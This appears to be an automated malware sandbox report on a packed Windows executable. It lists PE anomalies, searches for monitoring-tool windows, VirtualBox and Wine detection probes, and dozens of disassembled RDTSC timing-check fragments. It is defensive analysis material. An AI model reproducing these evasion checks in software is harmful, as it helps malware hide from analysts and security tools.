                Source: C:\Users\user\Desktop\FBmz85HS0d.exeUnpacked PE file: 0.2.FBmz85HS0d.exe.2a0000.0.unpack :EW;.rsrc :W;.idata :W;avozcotg:EW;rwvgytwe:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;avozcotg:EW;rwvgytwe:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: FBmz85HS0d.exeStatic PE information: real checksum: 0x2d7e33 should be: 0x2cfaf9
                Source: FBmz85HS0d.exeStatic PE information: section name:
                Source: FBmz85HS0d.exeStatic PE information: section name: .rsrc
                Source: FBmz85HS0d.exeStatic PE information: section name: .idata
                Source: FBmz85HS0d.exeStatic PE information: section name: avozcotg
                Source: FBmz85HS0d.exeStatic PE information: section name: rwvgytwe
                Source: FBmz85HS0d.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_012289AB push ecx; iretd 0_3_012289B9
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_01226A97 push ds; retf 0_3_01226A98
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_012289AB push ecx; iretd 0_3_012289B9
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_01226A97 push ds; retf 0_3_01226A98
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_0126EC51 push ebp; iretd 0_3_0126F0C8
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_0120C33C push 480120C3h; ret 0_3_0120C35D
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_0590499C push esi; retf 0_3_0590499F
                Source: FBmz85HS0d.exeStatic PE information: section name: entropy: 7.9798629308220566

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 477976 second address: 47797E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 476AD6 second address: 476AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79895h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F4EF0C7988Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 476F69 second address: 476F87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4EF0C09E28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 479A2A second address: 479A7E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F4EF0C79886h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jng 00007F4EF0C79890h 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 js 00007F4EF0C79886h 0x0000001c popad 0x0000001d nop 0x0000001e call 00007F4EF0C79892h 0x00000023 jnl 00007F4EF0C7988Ch 0x00000029 pop edi 0x0000002a push 00000000h 0x0000002c sbb esi, 47B7C1D3h 0x00000032 push 8E6FBD3Fh 0x00000037 jnc 00007F4EF0C79894h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 479A7E second address: 479A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 479A82 second address: 479B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 71904341h 0x0000000d push esi 0x0000000e mov edi, 695DA656h 0x00000013 pop edx 0x00000014 push 00000003h 0x00000016 call 00007F4EF0C79894h 0x0000001b pushad 0x0000001c adc dx, 5CA7h 0x00000021 xor ebx, 540CD5E1h 0x00000027 popad 0x00000028 pop edi 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c jmp 00007F4EF0C79896h 0x00000031 popad 0x00000032 push 00000003h 0x00000034 mov di, 2CABh 0x00000038 call 00007F4EF0C79889h 0x0000003d jg 00007F4EF0C79892h 0x00000043 jng 00007F4EF0C7988Ch 0x00000049 push eax 0x0000004a jnl 00007F4EF0C79899h 0x00000050 jmp 00007F4EF0C79893h 0x00000055 mov eax, dword ptr [esp+04h] 0x00000059 jne 00007F4EF0C798A5h 0x0000005f mov eax, dword ptr [eax] 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F4EF0C7988Fh 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 479B4B second address: 479BC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jnl 00007F4EF0C09E16h 0x00000015 jnl 00007F4EF0C09E16h 0x0000001b popad 0x0000001c jne 00007F4EF0C09E1Ch 0x00000022 popad 0x00000023 pop eax 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007F4EF0C09E18h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e add dword ptr [ebp+122D2B2Bh], edx 0x00000044 lea ebx, dword ptr [ebp+124558DCh] 0x0000004a mov dword ptr [ebp+122D1D54h], edi 0x00000050 xchg eax, ebx 0x00000051 pushad 0x00000052 jmp 00007F4EF0C09E1Bh 0x00000057 pushad 0x00000058 pushad 0x00000059 popad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 479E59 second address: 479E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 479E5D second address: 479E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 49A917 second address: 49A953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Fh 0x00000007 push esi 0x00000008 jnl 00007F4EF0C79886h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F4EF0C79886h 0x0000001b jmp 00007F4EF0C79897h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 49A953 second address: 49A969 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F4EF0C09E16h 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F4EF0C09E16h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 463899 second address: 46389D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 498A3F second address: 498A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 498A46 second address: 498A66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F4EF0C798CAh 0x0000000e jmp 00007F4EF0C7988Fh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 498A66 second address: 498A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 498BC9 second address: 498BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79898h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 498EAD second address: 498EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 499044 second address: 499048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 499048 second address: 499075 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jbe 00007F4EF0C09E16h 0x00000010 jmp 00007F4EF0C09E20h 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 499075 second address: 499079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 499079 second address: 49907D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4991C9 second address: 4991DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F4EF0C7988Ch 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4991DD second address: 4991E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 499463 second address: 49947C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C7988Fh 0x00000009 jp 00007F4EF0C79886h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4995CB second address: 4995CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 49972A second address: 499747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4EF0C7988Ch 0x0000000a jmp 00007F4EF0C7988Ah 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 499747 second address: 49974D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 49974D second address: 49978F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C7988Ch 0x00000009 jc 00007F4EF0C79886h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F4EF0C7989Ah 0x00000019 ja 00007F4EF0C7988Eh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 49978F second address: 499795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 499795 second address: 49979F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4EF0C79886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4998FB second address: 49990C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F4EF0C09E16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 49990C second address: 499944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4EF0C79890h 0x0000000d jne 00007F4EF0C798A0h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F4EF0C79898h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 499944 second address: 49994A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 48DEEE second address: 48DEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 48DEF2 second address: 48DEF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 48DEF8 second address: 48DF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F4EF0C79888h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F4EF0C79893h 0x00000016 pop edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 46F34F second address: 46F363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E20h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 46F363 second address: 46F395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnl 00007F4EF0C79886h 0x0000000f jmp 00007F4EF0C79897h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jne 00007F4EF0C79886h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 46F395 second address: 46F3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E1Fh 0x00000009 jg 00007F4EF0C09E16h 0x0000000f popad 0x00000010 jmp 00007F4EF0C09E20h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 46F3BF second address: 46F3C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 499A90 second address: 499AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E25h 0x00000007 jmp 00007F4EF0C09E27h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F4EF0C09E1Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4EF0C09E1Dh 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 49A0C5 second address: 49A0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4EF0C7988Bh 0x0000000b popad 0x0000000c jnl 00007F4EF0C79888h 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F4EF0C79886h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 49A242 second address: 49A252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 49A3D7 second address: 49A3E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4EF0C79886h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 466D8C second address: 466DB3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4EF0C09E1Ch 0x00000008 pushad 0x00000009 jo 00007F4EF0C09E16h 0x0000000f jl 00007F4EF0C09E16h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 466DB3 second address: 466DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 466DB9 second address: 466DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E25h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A2A80 second address: 4A2A9A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4EF0C7988Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F4EF0C79886h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A12FD second address: 4A131A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4EF0C09E21h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A2C22 second address: 4A2C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A792A second address: 4A7975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4EF0C09E29h 0x00000008 jbe 00007F4EF0C09E16h 0x0000000e popad 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jp 00007F4EF0C09E2Eh 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7975 second address: 4A7986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnl 00007F4EF0C79886h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7ABA second address: 4A7AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
